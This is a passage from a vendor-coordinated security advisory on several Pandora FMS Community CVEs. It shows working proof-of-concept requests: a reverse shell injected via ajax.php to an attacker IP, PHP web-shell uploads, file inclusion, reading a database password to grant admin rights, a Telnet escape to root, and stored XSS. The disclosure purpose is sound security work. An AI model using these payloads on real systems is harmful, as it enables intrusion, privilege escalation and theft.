shell by tampering the `target` parameter:\n \n \n POST /pandora_console/ajax.php HTTP/1.1\n Host: 192.168.1.20\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: text/html, */*; q=0.01\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n Content-Length: 124\n Origin: http://192.168.1.20\n Connection: close\n Referer: http://192.168.1.20/pandora_console/index.php?sec=eventos&sec2=operation/events/events\n Cookie: PHPSESSID=lo4k64pfhme12ic7reau9t5dqh\n \n page=include/ajax/events&perform_event_response=10000000\n &**target=bash -i >%26 /dev/tcp/192.168.1.17/1337 0>%261**&response_id=1\n \n\nAfter sending the request, a reverse connection on the attack server is received:\n \n \n [email\u00a0protected]:~# nc -vlp 1337\n Listening on [0.0.0.0] (family 0, port 1337)\n **Connection from 192.168.1.20 51010 received!\n bash: no job control in this shell\n bash-4.2$ whoami\n apache**\n \n\nAdditionally, in a default installation, the application reads MySQL database credentials from the plaintext `/var/www/html/pandora_console/include/config.php` file. It is possible for an attacker to gain remote command execution with the apache system user in the underlying server. This could be done, for instance, by exploiting this vulnerability or any other explained in the following sections involving remote code execution. Once this is achieved, they could then attempt connecting to the pandora database. From there, they could, for example, elevate the privileges of the compromised Pandora Console user account to an administrator.\n\n_Note: We observed that the database credentials differ between the Docker container and the CentOS ISO appliance, said values being _`avwwoyqk`_ and \u201c_`pandora`_, respectively._\n\nThe following proof of concept shows an attacker reading the plaintext value of the database password and then connecting to the server to escalate privileges of the compromised low privilege console user to an administrator:\n \n \n **1. Reading from the config.php file**\n \n bash-4.1$ cd include\n cd include\n bash-4.1$ cat config.php | grep dbpass\n cat config.php | grep dbpass\n \t\t**$config[\"dbpass\"]=\"avwwoyqk\";**\t// DB Password\n // $config[\"dbpass\"]=\"pandora\";\n \n **2. Querying the database**\n \n mysql> select is_admin from tusuario where id_user = \"test\";\n +----------+\n | is_admin |\n +----------+\n | 0 |\n +----------+\n 1 row in set (0.00 sec)\n \n **3. Assigning admin permissions to the compromised user**\n \n mysql> update tusuario set is_admin = 1 where id_user = \"test\";\n Query OK, 1 row affected (0.01 sec)\n Rows matched: 1 Changed: 1 Warnings: 0\n \n mysql> select is_admin from tusuario where id_user = \"test\";\n +----------+\n | is_admin |\n +----------+\n | 1 |\n +----------+\n 1 row in set (0.00 sec)\n \n\n### 7.2. Arbitrary File Upload Via the File Manager Feature Leading to Remote Command Execution\n\n[[CVE-2020-13852](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13852>)] Pandora FMS provides a `File Manager` feature accessible by users with administrative privileges. It is possible to abuse this functionality to upload a file containing a PHP web shell to a restricted folder which may lead to the execution of commands with the privileges of the `apache` user.\n\nThe following proof of concept demonstrates the vulnerability:\n\nLogged in as an administrator, it is possible to leverage the `File Manager` feature to upload a PHP file. Executing this PHP file would lead to the execution of any system command provided to the page via the HTTP POST `cmd` parameter. The code of the web shell is shown below:\n \n \n <?php\n $output = shell_exec($_POST['cmd']);\n echo \"<pre>$output</pre>\"; \n ?> \n **[Request]**\n POST /pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager \n HTTP/1.1\n Host: 192.168.1.20\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Content-Type: multipart/form-data; boundary=---------------------------19068623751021147411178271167\n Content-Length: 1336\n Origin: http://192.168.1.20\n Connection: close\n Referer: http://192.168.1.20/pandora_console/index.php?sec=gextensions&sec2=godmode/setup/file_manager\n Cookie: PHPSESSID=gop2lt4002uc2afj9p66jou1d0\n Upgrade-Insecure-Requests: 1\n \n -----------------------------19068623751021147411178271167\n **Content-Disposition: form-data; name=\"file\"; filename=\"web_shell.php\"\n Content-Type: application/x-php\n \n <?php \n $output = shell_exec($_POST['cmd']); \n echo \"<pre>$output</pre>\"; \n ?>**\n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"umask\"\n \n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"decompress_sent\"\n 1\n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"go\"\n Go\n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"real_directory\"\n /var/www/html/pandora_console/images\n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"directory\"\n images\n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"hash\"\n 8ab9a12b08e95f7d1a23cfaaf198ed04\n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"hash2\"\n 3976ae502982bca85302c6766fc340ec\n -----------------------------19068623751021147411178271167\n Content-Disposition: form-data; name=\"upload_file_or_zip\"\n 1\n -----------------------------19068623751021147411178271167--\n \n **[Response]**\n HTTP/1.1 200 OK\n Date: Mon, 09 Mar 2020 19:12:25 GMT\n Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.16\n X-Powered-By: PHP/7.2.16\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=gop2lt4002uc2afj9p66jou1d0; expires=Mon, 09-Mar-2020 20:42:25 GMT; Max-Age=5400; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Connection: close\n Content-Type: text/html; charset=UTF-8\n Content-Length: 1406328\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n \n <title>Pandora FMS - the Flexible Monitoring System</title>\n <meta http-equiv=\"expires\" content=\"never\" />\n <meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\" />\n <meta http-equiv=\"Content-Style-Type\" content=\"text/css\" />\n <meta name=\"resource-type\" content=\"document\" />\n [...]\n \n\nIt is possible to leverage the `ajax.php` script to execute the previously uploaded web shell, as this script has a `Local File Inclusion` vulnerability. It was observed that this script passes the content of the POST `page` parameter as the argument of an `include_once()` function. The validation performed to the page value before being passed to the inclusion function proved to be insufficient, as it only deterred loading remotely hosted scripts, but allowed loading any PHP file previously uploaded to the local file system. Finally, it should be noted that `ajax.php` is accessible by non-administrative users as well.\n\nThe following example demonstrates the execution of the `ls` command:\n \n \n **[Request]**\n POST /pandora_console/ajax.php HTTP/1.1\n Host: 192.168.1.20\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: application/json, text/javascript, */*; q=0.01\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n Content-Length: 67\n Origin: http://192.168.1.20\n Connection: close\n Referer: http://192.168.1.20/pandora_console/index.php?sec=godmode/extensions&sec2=extensions/files_repo\n Cookie: PHPSESSID=gop2lt4002uc2afj9p66jou1d0\n \n **page=/var/www/html/pandora_console/images/web_shell&cmd=whoami%26ls**\n \n **[Response]**\n HTTP/1.1 200 OK\n Date: Mon, 09 Mar 2020 19:22:06 GMT\n Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.16\n X-Powered-By: PHP/7.2.16\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=gop2lt4002uc2afj9p66jou1d0; expires=Mon, 09-Mar-2020 20:52:06 GMT; Max-Age=5400; path=/\n Content-Length: 474\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n <pre>apache\n AUTHORS\n COPYING\n DB_Dockerfile\n DEBIAN\n Dockerfile\n ajax.php\n attachment\n audit.log\n composer.json\n composer.lock\n docker_entrypoint.sh\n extensions\n extras\n fonts\n general\n godmode\n images\n include\n index.php\n install.done\n mobile\n operation\n pandora_console.log\n pandora_console_logrotate_centos\n pandora_console_logrotate_suse\n pandora_console_logrotate_ubuntu\n pandora_console_upgrade\n pandora_websocket_engine.service\n pandoradb.sql\n pandoradb_data.sql\n tests\n tools\n vendor\n ws.php\n </pre>\n \n\n### 7.3. Arbitrary File Upload Via the File Repository Manager Feature Leading to Remote Command Execution\n\n[[CVE-2020-13855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13855>)] Pandora FMS provides an administrative user with the `File Repository` feature. This feature is different from the `File Manager` function, affected by the vulnerability 7.2. It is possible to abuse this functionality to upload a file containing a PHP web shell to a publicly accessible folder, which could lead to the execution of system commands with the privileges of the `apache` user.\n\nThe following proof of concept demonstrates the vulnerability\n\nLogged in as an administrator, it is possible to leverage the `File Manager` feature to upload a PHP file. Executing this PHP file would lead to the execution of any system command provided to the page via the HTTP POST `cmd` parameter. This code of the web shell is shown below:\n \n \n <?php\n $output = shell_exec($_POST ['cmd'];\n echo \"<pre>$output</pre>\";\n ?>\n **\n [Request]**\n POST /pandora_console/index.php?sec=godmode/extensions&sec2=extensions/files_repo HTTP/1.1\n Host: 192.168.1.20\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Content-Type: multipart/form-data; boundary=---------------------------70052089918250578231458401616\n Content-Length: 771\n Origin: http://192.168.1.20\n Connection: close\n Referer: http://192.168.1.20/pandora_console/index.php?sec=godmode/extensions&sec2=extensions/files_repo\n Cookie: PHPSESSID=gop2lt4002uc2afj9p66jou1d0\n Upgrade-Insecure-Requests: 1\n \n -----------------------------70052089918250578231458401616\n **Content-Disposition: form-data; name=\"description\"\n \n \n -----------------------------70052089918250578231458401616\n Content-Disposition: form-data; name=\"upfile\"; filename=\"core.php\n Content-Type: application/x-php\n \n <?php \n \n $output = shell_exec($_GET['cmd']); \n \n echo \"<pre>$output</pre>\"; \n ?>**\n -----------------------------70052089918250578231458401616\n Content-Disposition: form-data; name=\"public_sent\"\n \n 1\n -----------------------------70052089918250578231458401616\n Content-Disposition: form-data; name=\"submit\"\n \n Add\n -----------------------------70052089918250578231458401616\n Content-Disposition: form-data; name=\"add_file\"\n \n 1\n -----------------------------70052089918250578231458401616--\n **\n [Response]**\n HTTP/1.1 200 OK\n Date: Mon, 09 Mar 2020 19:29:12 GMT\n Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.16\n X-Powered-By: PHP/7.2.16\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=gop2lt4002uc2afj9p66jou1d0; expires=Mon, 09-Mar-2020 20:59:12 GMT; Max-Age=5400; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Connection: close\n Content-Type: text/html; charset=UTF-8\n Content-Length: 83935\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \n \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n \n <title>Pandora FMS - the Flexible Monitoring System</title>\n <meta http-equiv=\"expires\" content=\"never\" />\n <meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\" />\n <meta http-equiv=\"Content-Style-Type\" content=\"text/css\" />\n <meta name=\"resource-type\" content=\"document\" />\n <meta name=\"distribution\" content=\"global\" />\n <meta name=\"author\" content=\"\u00c1rtica ST\" />\n [...]\n </script><div class='pagination ' ><div class=\"total_pages\">Total \n items: 3</div></div><table style=\"width:100%; \" cellpadding=\"4\" \n cellspacing=\"4\" border=\"0\" class=\"info_table\" \n id=\"table2\"><thead><tr><th class=\"header c0\" \n scope=\"col\">Name</th><th class=\"header c1\" \n scope=\"col\">Description</th><th class=\"header c2\" \n scope=\"col\">Size</th><th class=\"header c3\" scope=\"col\">Last \n modification</th><th class=\"header c4\" \n scope=\"col\"></th></tr></thead>\n <tbody>\n <tr id=\"table2-0\" style=\"\" class=\"datos2\">\n <td id=\"table2-0-0\" style=\"\" class=\"datos2 \"><a \n href=\"http://192.168.1.20/pandora_console/include/get_file.php?file=M193ZWJfc2hlbGwuc\n Ghw&hash=50be35ccbab054c01ec1a555be30839e\" \n target=\"_blank\">web_shell.php</a></td>\n <td id=\"table2-0-1\" style=\" max-width: 200px;;\" class=\"datos2 \"></td>\n <td id=\"table2-0-2\" style=\"\" class=\"datos2 \">84 B</td>\n <td id=\"table2-0-3\" style=\"\" class=\"datos2 \">March 9, 2020, 4:29 \n pm</td>\n [...]\n \n\nIt is possible to directly execute the PHP file by browsing to the URL `http://<pandora_console_ip>/pandora_console/attachment/files_repo/2_core.php?cmd=<command_to_execute>`. Authentication is not required to browse this web location.\n\nThe following example demonstrates the execution of `whoami` and `ls` commands:\n \n \n **[Request]**\n GET /pandora_console/attachment/files_repo/**2_core.php?cmd=whoami;ls **HTTP/1.1\n Host: 192.168.1.20\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n \n **[Response]**\n HTTP/1.1 200 OK\n Date: Mon, 09 Mar 2020 19:37:14 GMT\n Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.16\n X-Powered-By: PHP/7.2.16\n Content-Length: 77\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n <pre>apache\n 1_coresec.html\n 2_core.php\n 3_web_shell.php\n 4_web_shell.php\n </pre>\n \n\n### 7.4. Privilege Escalation\n\n[[CVE-2020-13854](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13854>)] Pandora FMS has a plugin named `Quick Shell` installed by default. This plugin is a Pandora FMS console extension that allows someone to connect any agent to a configured IP through SSH or Telnet. The Pandora FMS backend server uses `Gotty` in order to provide this functionality. As would be expected, `Gotty` service runs with root privileges:\n\nThe vulnerability resides in the Telnet client. In order to reproduce this, the following steps must be taken:\n\n\n\n 1. The attacker has to open a non-privileged port with Netcat (which will run in the context of the apache user) using the remote shell obtained from any of the remote code execution vulnerabilities described in 7.1, 7.2 or 7.3.\n 2. Using the Telnet feature available through the `Quick Shell` plugin in the agent installed by default in the Virtual Appliance, it is possible to connect to the port exposed by Netcat. \n\n \n bash-4.2$ nc -lvp 20000\n nc -lvp 20000\n Ncat: Version 7.50 ( https://nmap.org/ncat )\n Ncat: Listening on :::20000\n Ncat: Listening on 0.0.0.0:20000**\n Ncat: Connection from 10.74.48.90.\n Ncat: Connection from 10.74.48.90:60618.**\n \n\n 3. After performing the connection, the Telnet client in the web console waits for an input. Then, using the escape sequence of characters ^], it is possible to go back to the Telnet prompt. Finally, with the command `!/bin/bash`, it is possible to escape from the Telnet client and execute commands in the context of `Gotty`, which is running by default with `root` privileges. The following screenshot shows the execution of the id and `whoami` commands:\n\n\n\n_NOTE: Occasionally, in order to exploit this vulnerability, is necessary to perform the connection twice. This is because Gotty sometimes closes the connection with the Telnet client immediately before it\u2019s possible to send the escape sequence._\n\n### 7.5 Inadequate Access Controls on a Web Folder\n\n[[CVE-2020-13850](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13850>)] It is possible to access various locations in the Pandora FMS Console web folder via direct browsing without being logged-on. This could be leveraged by a malicious individual to disclose potentially sensitive information, such as logs and uploaded files.\n\nThe following URLs can be accessed without requiring previous authentication:\n\nLog files:\n\n * `http://<pandora_console_ip>/pandora_console/audit.log`\n * `http://<pandora_console_ip>/pandora_console/pandora_console.log`\n\nFiles repositories which are vulnerable to directory listing:\n\n * `http://<pandora_console_ip>/pandora_console/attachment/download/`\n * `http://<pandora_console_ip>/pandora_console/attachment/files_repo/`\n\n### 7.6 Persistent XSS in the Messages Feature\n\n[[CVE-2020-13853](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13853>)] We observed that it is possible for users to send messages between one another, including a chunk of arbitrary JavaScript code within the body. This chunk will then be executed in the context of the recipient\u2019s browser after opening the message for reading. In particular, this behavior can be leveraged by an attacker with access to a set of credentials for a low privilege user to target a logged-in administrator and attempt to steal his/her current session cookie.\n\nThe following proof of concept demonstrates this vulnerability:\n\nThe section below shows the injection of arbitrary JavaScript code through the message feature:\n \n \n **[Request]**\n POST /pandora_console/index.php?sec=message_list&sec2=operation/messages\n message_edit&new_msg=1 HTTP/1.1\n Host: 192.168.1.143\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 125\n Origin: http://192.168.1.143\n Connection: close\n Referer: http://192.168.1.143/pandora_console/index.php?sec=message_list&sec2=operation\n /messages/message_edit&new_msg=1\n Cookie: PHPSESSID=iuhhef8aikdbpkc2gunq6p52sg\n Upgrade-Insecure-Requests: 1\n \n dst_user=admin&dst_group**=&subject=Testing&message=%3Cscript%3Ealert%28document.cookie\n %29%3C%2Fscript%3E&**send_mes=Send+message\n **\n [Response]**\n HTTP/1.1 200 OK\n Date: Tue, 10 Mar 2020 18:18:42 GMT\n Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.16\n X-Powered-By: PHP/7.2.16\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=iuhhef8aikdbpkc2gunq6p52sg; expires=Tue, 10-Mar-2020 19:48:42 GMT; Max-Age=5400; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Connection: close\n Content-Type: text/html; charset=UTF-8\n Content-Length: 61719\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n \n \t<title>Pandora FMS - the Flexible Monitoring System</title>\n \t\t<meta http-equiv=\"expires\" content=\"never\" />\n \t\t<meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\" />\n \t\t<meta http-equiv=\"Content-Style-Type\" content=\"text/css\" />\n \t\t<meta name=\"resource-type\" content=\"document\" />\n \t\t<meta name=\"distribution\" content=\"global\" />\n \t\t<meta name=\"author\" content=\"\u00c1rtica ST\" />\n \t\t<meta name=\"copyright\" content=\"(c) \u00c1rtica ST\" />\n \t\t<meta name=\"robots\" content=\"index, follow\" /><link rel=\"icon\" \n href=\"images/pandora.ico\" type=\"image/ico\" />\t\n [truncated]\n \n\nThe following section shows the JavaScript payload being included within the HTML page generated when attempting to read the message as the recipient:\n \n \n **[Request]**\n GET /pandora_console/index.php?sec=message_list&sec2=operation/messages/message_edit&\n read_message=1&**id_message=17** HTTP/1.1\n Host: 192.168.1.143\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Referer: http://192.168.1.143/pandora_console/index.php?sec=message_list&sec2=operation\n /messages/message_list\n Cookie: PHPSESSID=p8n31qt30gpdm8enseqirtqbi3\n Upgrade-Insecure-Requests: 1\n **\n [Response]**\n HTTP/1.1 200 OK\n Date: Tue, 10 Mar 2020 18:21:04 GMT\n Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.16\n X-Powered-By: PHP/7.2.16\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=p8n31qt30gpdm8enseqirtqbi3; expires=Tue, 10-Mar-2020 19:51:04 \n GMT; Max-Age=5400; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Set-Cookie: clippy=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Connection: close\n Content-Type: text/html; charset=UTF-8\n Content-Length: 77725\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \n \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n [...]\n </script>\n </div><button onclick=\"topFunction()\" id=\"top_btn\" title=\"Go to top\"></button><div \n id=\"main\"><div id=\"menu_tab_frame_view\" style=\"\"><div id=\"menu_tab_left\"><ul \n class=\"mn\"><li class=\"view\"><span>Messages</span></li></ul></div><div \n id=\"menu_tab\"><ul class=\"mn\"><li class=\"nomn tab_operation\"><a \n href=\"index.php?sec=message_list&sec2=operation/messages/message_list\"><img \n src=\"http://192.168.1.143/pandora_console/images/email_inbox.png\" data-\n title=\"Received messages\" data-use_title_for_force_title=\"1\" class=\"forced_title\" \n alt=\"Received messages\" /></a></li><li class=\"nomn tab_operation\"><a \n href=\"index.php?sec=message_list&sec2=operation/messages/message_list&show_sent=1\n \"><img src=\"http://192.168.1.143/pandora_console/images/email_outbox.png\" data-\n title=\"Sent messages\" data-use_title_for_force_title=\"1\" class=\"forced_title\" \n alt=\"Sent messages\" /></a></li><li class=\"nomn_high tab_operation\"><a \n href=\"index.php?sec=message_list&sec2=operation/messages/message_edit\"><img \n src=\"http://192.168.1.143/pandora_console/images/new_message.png\" data-title=\"Create \n message\" data-use_title_for_force_title=\"1\" class=\"forced_title\" alt=\"Create message\" \n /></a></li></ul></div></div><h1>Conversation with test</h1><h2>Subject: \n Testing</h2><div class=\"container\"> \n <p>**<script>alert(document.cookie)</script>**</p><span class=\"time-left\">March 10, 2020, \n 3:18 pm test</span></div><form id=\"delete_message\" method=\"post\" \n action=\"index.php?sec=message_list&sec2=operation/messages/message_list&show_sent\n =1&delete_message=1&id=17\"></form><form id=\"reply_message\" method=\"post\" \n action=\"index.php?sec=message_list&sec2=operation/messages/message_edit&new_msg=1\n &reply=1\"><input id=\"hidden-dst_user\" name=\"dst_user\" type=\"hidden\" value=\"test\" \n /><input id=\"hidden-subject\" name=\"subject\" type=\"hidden\" value=\"RE: Testing\" \n /><input id=\"hidden-message\" name=\"message\" type=\"hidden\" value=\"\n \n \n On March 10, 2020, 3:18 pm test wrote:\n \n **<script>alert(document.cookie)</script>\" **/>\n [truncated]\n \n\nThe following screenshot shows the JavaScript code being executed in the context of the recipient\u2019s browser:\n\n\n\n## 8\\. Report Timeline\n\n2020-04-08 - Contact with vendor made through feedback form.\n\n2020-04-08 - Response received from CEO requesting clarifications.\n\n2020-04-08 - Advisory draft sent to vendor.\n\n2020-04-13 - Response received from vendor acknowledging the vulnerabilities.\n\n2020-06-03 - Pandora FMS 746 version released by development team.\n\n2020-06-04 - CVE IDs requested and received from Mitre.\n\n2020-06-09 - Advisory published.\n\n## 9\\. References\n\n[1] <https://pandorafms.com>\n\n[2] <https://pandorafms.com/downloads/whats-new-745-EN.pdf>\n\n[3] <https://pandorafms.com/downloads/whats-new-746-EN.pdf>\n\n## 10\\. About CoreLabs\n\nCoreLabs, the research center of Core Security, A HelpSystems Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>. \n\n## 11\\. About Core Security, A HelpSystems Company\n\nCore Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at [www.coresecurity.com](<https://www.coresecurity.com>).\n\nCore Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, [contact](<https://www.coresecurity.com/contact>) Core Security at (678) 304-4500 or [email protected]. \n\n## 12\\. Disclaimer\n\nThe contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "coresecurity", "title": "Pandora FMS Community Multiple Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13850", "CVE-2020-13851", "CVE-2020-13852", "CVE-2020-13853", "CVE-2020-13854", "CVE-2020-13855"], "modified": "2020-06-09T00:00:00", "id": "CORE-2020-0010", "href": "https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
Pandora FMS 7.0 NG 7XX Remote Command Execution Exploit
